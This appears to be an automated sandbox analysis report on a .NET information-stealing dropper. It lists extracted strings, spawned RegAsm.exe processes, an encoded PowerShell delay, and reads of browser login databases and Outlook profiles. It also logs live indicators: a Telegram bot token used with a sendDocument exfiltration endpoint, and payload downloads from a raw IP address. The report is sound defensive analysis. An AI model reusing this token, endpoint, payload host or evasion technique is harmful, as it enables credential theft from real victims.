                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentH
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentP
                    Source: RegAsm.exe, 00000010.00000002.639930266.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botH
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org48k
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/novotnyllc/bc-csharp
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vectorstealer.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                    Source: RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown | HTTP traffic detected: POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary="e749d4e4-749a-41ce-b152-70d8d1eceec1" | Host: api.telegram.org | Content-Length: 2227 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1 | Host: 41.216.183.235 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1 | Host: 41.216.183.235 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1 | Host: 41.216.183.235 | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.501718718.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Code function: 0_2_01201BB8, 0_2_08D3B8C0, 0_2_08D3D230, 0_2_08D3A678, 0_2_08D369B8, 0_2_08D3A39A, 0_2_08D3A316, 0_2_08D3A668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_012E0B38, 16_2_012E13C0, 16_2_012ED220, 16_2_012EC201, 16_2_012E3E40, 16_2_012EA328, 16_2_012E0B28, 16_2_012EA31A, 16_2_012E13B0, 16_2_012EAA38, 16_2_012EAA48, 16_2_012E4740, 16_2_012E3E30, 16_2_05284D68, 16_2_05280C68, 16_2_052881F0, 16_2_05280C58, 16_2_0528A4E8, 16_2_0528A4F8, 16_2_052819A1, 16_2_052819B0, 16_2_052881E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process Stats: CPU usage > 98%
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.500391036.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePayload.exe* vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000000.248009549.00000000008E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePAGOS.exe" vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.580509786.0000000007DE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclrjit.dllT vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.580509786.0000000007DE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.501718718.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Binary or memory string: OriginalFilenamePAGOS.exe" vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA== (the base64 UTF-16LE argument decodes to: Start-Sleep -Seconds 56)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA== (the base64 UTF-16LE argument decodes to: Start-Sleep -Seconds 56)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | File created: C:\Users\user\AppData\Roaming\Ccxsx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2d0nmbdt.wyd.ps1
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/14@3/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: tmp3354.tmp.tmpdb.16.dr, tmpC1FC.tmp.16.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_01
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdb source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: Yara match | File source: 16.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.7cdfeec.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.666417537.000000000B141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.291180894.00000000092C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000000.495309818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.619906985.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.630141577.000000000AD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.289147752.0000000008EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.504811512.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe PID: 5792, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, Form2.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Fdmru.exe.0.dr, Form2.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.8e0000.0.unpack, Form2.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
